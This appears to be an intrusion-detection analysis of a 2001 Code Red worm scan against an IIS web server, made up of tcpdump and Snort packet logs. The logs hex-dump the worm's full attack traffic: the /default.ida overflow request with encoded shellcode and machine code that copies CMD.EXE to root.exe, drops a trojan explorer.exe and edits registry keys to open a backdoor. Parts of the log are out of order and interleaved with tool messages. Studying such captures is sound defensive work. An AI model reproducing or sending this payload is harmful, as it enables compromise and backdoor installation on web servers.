34 30 34 20 4E 6F 74 20 46 6F 75 6E 64 3C 2F 54 404 Not Found</T 49 54 4C 45 3E 0A 3C 2F 48 45 41 44 3E 3C 42 4F ITLE>.</HEAD><BO 44 59 3E 0A 3C 48 31 3E 4E 6F 74 20 46 6F 75 6E DY>.<H1>Not Foun 64 3C 2F 48 31 3E 0A 54 68 65 20 72 65 71 75 65 d</H1>.The reque 73 74 65 64 20 55 52 4C 20 2F 64 65 66 61 75 6C sted URL /defaul 74 2E 69 64 61 20 77 61 73 20 6E 6F 74 20 66 6F t.ida was not fo 75 6E 64 20 6F 6E 20 74 68 69 73 20 73 65 72 76 und on this serv 65 72 2E 3C 50 3E 0A 3C 2F 42 4F 44 59 3E 3C 2F er.<P>.</BODY></ 48 54 4D 4C 3E 0A HTML>. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/06-13:11:48.507577 0:30:94:E5:D5:E5 -> 8:0:2B:C4:A9:6 type:0x800 len:0x3C 65.42.76.163:1508 -> victim.network.11:80 TCP TTL:117 TOS:0x0 ID:53715 IpLen:20 DgmLen:40 DF *****R** Seq: 0x55EAC877 Ack: 0x0 Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ =============================================================================== Snort processed 10 packets. Breakdown by protocol: Action Stats: TCP: 10 (100.000%) ALERTS: 0 UDP: 0 (0.000%) LOGGED: 0 ICMP: 0 (0.000%) PASSED: 0 ARP: 0 (0.000%) IPv6: 0 (0.000%) IPX: 0 (0.000%) OTHER: 0 (0.000%) =============================================================================== Fragmentation Stats: Fragmented IP Packets: 0 (0.000%) Rebuilt IP Packets: 0 Frag elements used: 0 Discarded(incomplete): 0 Discarded(timeout): 0 =============================================================================== TCP Stream Reassembly Stats: TCP Packets Used: 0 (0.000%) Reconstructed Packets: 0 (0.000%) Streams Reconstructed: 0 ===============================================================================

Analysis performed by Wes Bateman of the Manisec Corporation (http://www.manisec.com) Detect 1: Just Another Code Red Scan ##### 13:11:48.353253 < 65.42.76.163.1508 > victim.network.11.www: S 1441446284:1441446284(0) win 16384 (DF) 13:11:48.353489 < victim.network.11.www > 65.42.76.163.1508: S 1202270519:1202270519(0) ack 1441446285 win 32120 (DF) 13:11:48.387758 < 65.42.76.163.1508 > victim.network.11.www: . 1:1(0) ack 1 win 17520 (DF) 13:11:48.406750 < 65.42.76.163.1508 > victim.network.11.www: . 1:1461(1460) ack 1 win 17520 (DF) 13:11:48.406886 < victim.network.11.www > 65.42.76.163.1508: . 1:1(0) ack 1461 win 30660 (DF) 13:11:48.414877 < 65.42.76.163.1508 > victim.network.11.www: . 1461:2921(1460) ack 1 win 17520 (DF) 13:11:48.422354 < victim.network.11.www > 65.42.76.163.1508: . 1:1(0) ack 2921 win 32120 (DF) 13:11:48.467159 < 65.42.76.163.1508 > victim.network.11.www: P 2921:3819(898) ack 1 win 17520 (DF) 13:11:48.467892 < victim.network.11.www > 65.42.76.163.1508: P 1:359(358) ack 3819 win 32120 (DF) 13:11:48.507577 < 65.42.76.163.1508 > victim.network.11.www: R 1441450103:1441450103(0) win 0 (DF) ##### --== Initializing Snort ==-- TCPDUMP file reading mode. Reading network traffic from "65.42.76.163" file. snaplen = 1544 --== Initialization Complete ==-- 09/06-13:11:48.353253 0:30:94:E5:D5:E5 -> 8:0:2B:C4:A9:6 type:0x800 len:0x3E 65.42.76.163:1508 -> victim.network.11:80 TCP TTL:117 TOS:0x0 ID:53679 IpLen:20 DgmLen:48 DF ******S* Seq: 0x55EAB98C Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/06-13:11:48.353489 8:0:2B:C4:A9:6 -> 0:30:94:E5:D5:E5 type:0x800 len:0x3E victim.network.11:80 -> 65.42.76.163:1508 TCP TTL:64 TOS:0x0 ID:1697 IpLen:20 DgmLen:48 DF ***A**S* Seq: 0x47A93137 Ack: 0x55EAB98D Win: 0x7D78 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/06-13:11:48.387758 0:30:94:E5:D5:E5 -> 8:0:2B:C4:A9:6 type:0x800 len:0x3C 65.42.76.163:1508 -> victim.network.11:80 TCP TTL:117 TOS:0x0 ID:53684 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x55EAB98D Ack: 0x47A93138 Win: 0x4470 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/06-13:11:48.406750 0:30:94:E5:D5:E5 -> 8:0:2B:C4:A9:6 type:0x800 len:0x5EA 65.42.76.163:1508 -> victim.network.11:80 TCP TTL:117 TOS:0x0 ID:53685 IpLen:20 DgmLen:1500 DF ***A**** Seq: 0x55EAB98D Ack: 0x47A93138 Win: 0x4470 TcpLen: 20 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /default.ida 3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 ?XXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 X%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 u6858%ucbd3%u780 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 1%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63 u9090%u8190%u00c 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35 3%u0003%u8b00%u5 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25 31b%u53ff%u0078% 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54 u0000%u00=a HTT 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 P/1.0..Content-t 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F ype: text/xml.Co 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33 ntent-length: 33 37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 00 00 79 ........`.... 00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 00 00 ....dg.6..dg.&.. E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE FF FF .....h......\... 50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 8B 40 P.U...\...P.U..@ 10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 04 00 .....X....U.=... 00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A CD 0F B6 ....=........... C9 89 8D 54 FE FF FF 8B 75 08 81 7E 30 9A 02 00 ...T....u..~0... 00 0F 84 C4 00 00 00 C7 46 30 9A 02 00 00 E8 0A ........F0...... 00 00 00 5F 5F 5F 5F 5F 5F 5F 5F 5F 00 8B 1C 24 ..._________...$ FF 55 D8 66 0B C0 0F 95 85 38 FE FF FF C7 85 50 .U.f.....8.....P FE FF FF 01 00 00 00 6A 00 8D 85 50 FE FF FF 50 .......j...P...P 8D 85 38 FE FF FF 50 8B 45 08 FF 70 08 FF 90 84 ..8...P.E..p.... 00 00 00 80 BD 38 FE FF FF 01 74 68 53 FF 55 D4 .....8....thS.U. FF 55 EC 01 45 84 69 BD 54 FE FF FF 2C 01 00 00 .U..E.i.T...,... 81 C7 2C 01 00 00 E8 D2 04 00 00 F7 D0 0F AF C7 ..,............. 89 46 34 8D 45 88 50 6A 00 FF 75 08 E8 05 00 00 .F4.E.Pj..u..... 00 E9 01 FF FF FF 6A 00 6A 00 FF 55 F0 50 FF 55 ......j.j..U.P.U D0 4F 75 D2 E8 3B 05 00 00 69 BD 54 FE FF FF 00 .Ou..;...i.T.... 5C 26 05 81 C7 00 5C 26 05 57 FF 55 E8 6A 00 6A \&....\&.W.U.j.j 16 FF 55 8C 6A FF FF 55 E8 EB F9 8B 46 34 29 45 ..U.j..U....F4)E 84 6A 64 FF 55 E8 8D 85 3C FE FF FF 50 FF 55 C0 .jd.U...<...P.U. 0F B7 85 3C FE FF FF 3D D2 07 00 00 73 CF 0F B7 ...<...=....s... 85 3E FE FF FF 83 F8 0A 73 C3 66 C7 85 70 FF FF .>......s.f..p.. FF 02 00 66 C7 85 72 FF FF FF 00 50 E8 64 04 00 ...f..r....P.d.. 00 89 9D 74 FF FF FF 6A 00 6A 01 6A 02 FF 55 B8 ...t...j.j.j..U. 83 F8 FF 74 F2 89 45 80 6A 01 54 68 7E 66 04 80 ...t..E.j.Th~f.. FF 75 80 FF 55 A4 59 6A 10 8D 85 70 FF FF FF 50 .u..U.Yj...p...P FF 75 80 FF 55 B0 BB 01 00 00 00 0B C0 74 4B 33 .u..U........tK3 DB FF 55 94 3D 33 27 00 00 75 3F C7 85 68 FF FF ..U.=3'..u?..h.. FF 0A 00 00 00 C7 85 6C FF FF FF 00 00 00 00 C7 .......l........ 85 60 FF FF FF 01 00 00 00 8B 45 80 89 85 64 FF .`........E...d. FF FF 8D 85 68 FF FF FF 50 6A 00 8D 85 60 FF FF ....h...Pj...`.. FF 50 6A 00 6A 01 FF 55 A0 93 6A 00 54 68 7E 66 .Pj.j..U..j.Th~f 04 80 FF 75 80 FF 55 A4 59 83 FB 01 75 31 E8 00 ...u..U.Y...u1.. 00 00 00 58 2D D3 03 00 00 6A 00 68 EA 0E 00 00 ...X-....j.h.... 50 FF 75 80 FF 55 AC 3D EA 0E 00 00 75 11 6A 00 P.u..U.=....u.j. 6A 01 8D 85 5C FE FF FF 50 FF 75 80 FF 55 A8 FF j...\...P.u..U.. 75 80 FF 55 B4 E9 E7 FE FF FF BB 00 00 DF 77 81 u..U..........w. C3 00 00 01 00 81 FB 00 00 00 78 75 05 BB 00 00 ..........xu.... F0 BF 60 E8 0E 00 00 00 8B 64 24 08 64 67 8F 06 ..`......d$.dg.. 00 00 58 61 EB D9 64 67 FF 36 00 00 64 67 89 26 ..Xa..dg.6..dg.& 00 00 66 81 3B 4D 5A 75 E3 8B 4B 3C 81 3C 0B 50 ..f.;MZu..K<.<.P 45 00 00 75 D7 8B 54 0B 78 03 D3 8B 42 0C 81 3C E..u..T.x...B..< 03 4B 45 52 4E 75 C5 81 7C 03 04 45 4C 33 32 75 .KERNu..|..EL32u BB 33 C9 49 8B 72 20 03 F3 FC 41 AD 81 3C 03 47 .3.I.r ...A..<.G 65 74 50 75 F5 81 7C 03 04 72 6F 63 41 75 EB 03 etPu..|..rocAu.. 4A 10 49 D1 E1 03 4A 24 0F B7 0C 0B C1 E1 02 03 J.I...J$........ 4A 1C 8B 04 0B 03 C3 89 44 24 24 64 67 8F 06 00 J.......D$$dg... 00 58 61 C3 E8 51 FF FF FF 89 5D FC 89 45 F8 E8 .Xa..Q....]..E.. 0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 ....LoadLibraryA 00 FF 75 FC FF 55 F8 89 45 F4 E8 0D 00 00 00 43 ..u..U..E......C 72 65 61 74 65 54 68 72 65 61 64 00 FF 75 FC FF reateThread..u.. 55 F8 89 45 F0 E8 0D 00 00 00 47 65 74 54 69 63 U..E......GetTic 6B 43 6F 75 6E 74 00 FF 75 FC FF 55 F8 89 45 EC kCount..u..U..E. E8 06 00 00 00 53 6C 65 65 70 00 FF 75 FC FF 55 .....Sleep..u..U F8 89 45 E8 E8 17 00 00 00 47 65 74 53 79 73 74 ..E......GetSyst 65 6D 44 65 66 61 75 6C 74 4C 61 6E 67 49 44 00 emDefaultLangID. FF 75 FC FF 55 F8 89 45 E4 E8 14 00 00 00 47 65 .u..U..E......Ge 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 tSystemDirectory 41 00 FF 75 FC FF 55 F8 89 45 E0 E8 0A 00 00 00 A..u..U..E...... 43 6F 70 79 46 69 6C 65 41 00 FF 75 FC FF 55 F8 CopyFileA..u..U. 89 45 DC E8 10 00 00 00 47 6C 6F 62 61 6C 46 69 .E......GlobalFi 6E 64 41 74 6F 6D 41 00 FF 75 FC FF 55 F8 89 45 ndAtomA..u..U..E D8 E8 0F 00 00 00 47 6C 6F 62 61 6C 41 64 64 41 ......GlobalAddA 74 6F 6D 41 tomA =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/06-13:11:48.406886 8:0:2B:C4:A9:6 -> 0:30:94:E5:D5:E5 type:0x800 len:0x3C victim.network.11:80 -> 65.42.76.163:1508 TCP TTL:64 TOS:0x0 ID:1698 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x47A93138 Ack: 0x55EABF41 Win: 0x77C4 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/06-13:11:48.414877 0:30:94:E5:D5:E5 -> 8:0:2B:C4:A9:6 type:0x800 len:0x5EA 65.42.76.163:1508 -> victim.network.11:80 TCP TTL:117 TOS:0x0 ID:53686 IpLen:20 DgmLen:1500 DF ***A**** Seq: 0x55EABF41 Ack: 0x47A93138 Win: 0x4470 TcpLen: 20 00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43 ..u..U..E......C 6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55 loseHandle..u..U F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74 ..E......_lcreat 00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F ..u..U..E......_ 6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8 lwrite..u..U..E. E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC ....._lclose..u. FF 55 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79 .U..E......GetSy 73 74 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89 stemTime..u..U.. 45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C E......WS2_32.DL 4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63 L..U..E......soc 6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 ket..u..U..E.... 00 00 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75 ..closesocket..u BC FF 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74 ..U..E......ioct 6C 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45 lsocket..u..U..E A4 E8 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75 ......connect..u BC FF 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65 ..U..E......sele 63 74 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00 ct..u..U..E..... 00 73 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8 .send..u..U..E.. 05 00 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89 ....recv..u..U.. 45 A8 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61 E......gethostna 6D 65 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00 me..u..U..E..... 00 67 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF .gethostbyname.. 75 BC FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41 u..U..E......WSA 47 65 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC GetLastError..u. FF 55 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33 .U..E......USER3 32 2E 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 2.DLL..U..E..... 00 45 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF .ExitWindowsEx.. 75 90 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84 u..U..E...E.i... 08 08 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1 ..@.E....xV4.... C0 08 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 ........<.t.<.t. C3 E8 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 ................ E3 10 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 ................ E8 B4 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF ......... ...... FF FF FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF ................ FF 00 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04 .............Y.. 81 23 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F .#...#.X........ 74 9F 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 t....t.;.X...t.. 68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D h......\...P.U.. BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E ..\........\CMD. 45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 EXE.^.....cj.... 00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72 ..d:\inetpub\scr 69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C ipts\root.exe... 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 $....\...P.U.j.. 2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C +...d:\progra~1\ 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C common~1\system\ 4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B MSADC\root.exe.. 0C 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA .$....\...P.U... 05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00 ....MZP......... FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC ............@... 00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C ...........PE..L 01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0 ....*%)......... 00 8F 81 0B 01 02 19 00 04 00 00 00 08 00 00 00 ................ 00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00 ............ ... 00 40 00 00 10 00 00 00 04 00 00 01 00 00 00 00 .@.............. 00 00 00 03 00 0A 00 00 00 00 00 00 40 00 00 00 ............@... 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 ................ 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 ............... 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0C ............0... 01 FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 ................ 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 .......... ..`.. 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 04 ........... .... 00 00 00 0C 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 10 ..@............. 00 00 00 30 00 00 00 04 00 00 00 10 00 00 00 00 ...0............ 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC ..........@..... FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 68 04 01 00 00 68 ..........h....h D0 20 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE . @..a...... @.. 00 20 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 . @.....j.h. @.. 4C 01 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31 L........h.'...1 01 00 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A .....h.$@.h?...j 00 68 10 20 40 00 68 02 00 00 80 E8 32 01 00 00 .h. @.h.....2... 0B C0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68 ..u&j.hT @.j.j.h 48 20 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF H @..5.$@....... 35 D8 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68 5.$@......h.$@.h 3F 00 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80 ?...j.hX @.h.... E8 ED 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C .......uU.. @..L 00 00 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68 ..... @..B...j.h B8 20 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 . @.j.j.h. @..5. 24 40 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A $@......j.h. @.j 01 6A 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99 .j.h. @..5.$@... 00 00 00 FF 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 ....5.$@........ 05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0 ..$@.....h.$@.h. 20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40 @.h.$@.j.U.5.$@ 00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B ..`.....uI..$@.. C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81 .t@.. @..>.t6Ff. 7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20 ~.,,u...217.... 40 00 89 35 @..5 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/06-13:11:48.422354 8:0:2B:C4:A9:6 -> 0:30:94:E5:D5:E5 type:0x800 len:0x3C victim.network.11:80 -> 65.42.76.163:1508 TCP TTL:64 TOS:0x0 ID:1699 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x47A93138 Ack: 0x55EAC4F5 Win: 0x7D78 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/06-13:11:48.467159 0:30:94:E5:D5:E5 -> 8:0:2B:C4:A9:6 type:0x800 len:0x3B8 65.42.76.163:1508 -> victim.network.11:80 TCP TTL:117 TOS:0x0 ID:53709 IpLen:20 DgmLen:938 DF ***AP*** Seq: 0x55EAC4F5 Ack: 0x47A93138 Win: 0x4470 TcpLen: 20 D0 24 40 00 FF 35 D0 24 40 00 68 D0 20 40 00 6A .$@..5.$@.h. @.j 01 6A 00 55 FF 35 D8 24 40 00 E8 19 00 00 00 C3 .j.U.5.$@....... FF 25 60 30 40 00 FF 25 64 30 40 00 FF 25 68 30 .%`0@..%d0@..%h0 40 00 FF 25 70 30 40 00 FF 25 74 30 40 00 FF 25 @..%p0@..%t0@..% 78 30 40 00 FF 25 7C 30 40 FC FC FC FC FC FC FC x0@..%|0@....... FC FC FC FC FC FC FC FC FC FC FC FC 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 5C 45 58 50 4C 4F 52 .........\EXPLOR 45 52 2E 45 58 45 00 00 00 53 4F 46 54 57 41 52 ER.EXE...SOFTWAR 45 5C 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 E\Microsoft\Wind 6F 77 73 20 4E 54 5C 43 75 72 72 65 6E 74 56 65 ows NT\CurrentVe 72 73 69 6F 6E 5C 57 69 6E 6C 6F 67 6F 6E 00 00 rsion\Winlogon.. 00 53 46 43 44 69 73 61 62 6C 65 00 00 9D FF FF .SFCDisable..... FF 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 .SYSTEM\CurrentC 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 ontrolSet\Servic 65 73 5C 57 33 53 56 43 5C 50 61 72 61 6D 65 74 es\W3SVC\Paramet 65 72 73 5C 56 69 72 74 75 61 6C 20 52 6F 6F 74 ers\Virtual Root 73 00 00 00 00 2F 53 63 72 69 70 74 73 00 00 00 s..../Scripts... 00 2F 4D 53 41 44 43 00 00 2F 43 00 00 2F 44 00 ./MSADC../C../D. 00 63 3A 5C 2C 2C 32 31 37 00 00 00 00 64 3A 5C .c:\,,217....d:\ 2C 2C 32 31 37 FC FC FC FC FC FC FC FC FC FC FC ,,217........... FC FC FC FC FC FC FC FC FC FC FC FC FC FC 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 3C 30 00 00 00 00 00 00 00 00 00 00 84 30 ..<0...........0 00 00 60 30 00 00 4C 30 00 00 00 00 00 00 00 00 ..`0..L0........ 00 00 91 30 00 00 70 30 00 00 00 00 00 00 00 00 ...0..p0........ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9E 30 ...............0 00 00 A6 30 00 00 BE 30 00 00 00 00 00 00 C8 30 ...0...0.......0 00 00 DC 30 00 00 EE 30 00 00 FE 30 00 00 00 00 ...0...0...0.... 00 00 9E 30 00 00 A6 30 00 00 BE 30 00 00 00 00 ...0...0...0.... 00 00 C8 30 00 00 DC 30 00 00 EE 30 00 00 FE 30 ...0...0...0...0 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 ......KERNEL32.d 6C 6C 00 41 44 56 41 50 49 33 32 2E 64 6C 6C 00 ll.ADVAPI32.dll. 00 00 53 6C 65 65 70 00 00 00 47 65 74 57 69 6E ..Sleep...GetWin 64 6F 77 73 44 69 72 65 63 74 6F 72 79 41 00 00 dowsDirectoryA.. 00 00 57 69 6E 45 78 65 63 00 00 00 52 65 67 51 ..WinExec...RegQ 75 65 72 79 56 61 6C 75 65 45 78 41 00 00 00 00 ueryValueExA.... 52 65 67 53 65 74 56 61 6C 75 65 45 78 41 00 00 RegSetValueExA.. 00 00 52 65 67 4F 70 65 6E 4B 65 79 45 78 41 00 ..RegOpenKeyExA. 00 00 52 65 67 43 6C 6F 73 65 4B 65 79 FC FC FC ..RegCloseKey... Snort received signal 3, exiting FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ FC FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 5E BF B9 05 00 00 6A .........^.....j 07 E8 10 00 00 00 64 3A 5C 65 78 70 6C 6F 72 65 ......d:\explore 72 2E 65 78 65 00 8B 04 24 88 18 FF 55 CC 83 F8 r.exe...$...U... FF 74 4D 89 85 4C FE FF FF AC 8A F8 38 3E 75 27 .tM..L......8>u' 6A 20 E8 23 00 00 00 00 00 00 00 00 00 00 00 00 j .#............ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 6A 01 56 FF B5 4C FE FF FF .......j.V..L... FF 55 C8 46 4F 75 C5 FF B5 4C FE FF FF FF 55 C4 .U.FOu...L....U. FE C3 80 FB 64 0F 86 4C F9 FF FF C3 61 C9 C2 04 ....d..L....a... 00 90 .. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/06-13:11:48.467892 8:0:2B:C4:A9:6 -> 0:30:94:E5:D5:E5 type:0x800 len:0x19C victim.network.11:80 -> 65.42.76.163:1508 TCP TTL:64 TOS:0x0 ID:1700 IpLen:20 DgmLen:398 DF ***AP*** Seq: 0x47A93138 Ack: 0x55EAC877 Win: 0x7D78 TcpLen: 20 48 54 54 50 2F 31 2E 31 20 34 30 34 20 4E 6F 74 HTTP/1.1 404 Not 20 46 6F 75 6E 64 0D 0A 44 61 74 65 3A 20 54 68 Found..Date: Th 75 2C 20 30 36 20 53 65 70 20 32 30 30 31 20 31 u, 06 Sep 2001 1 38 3A 31 31 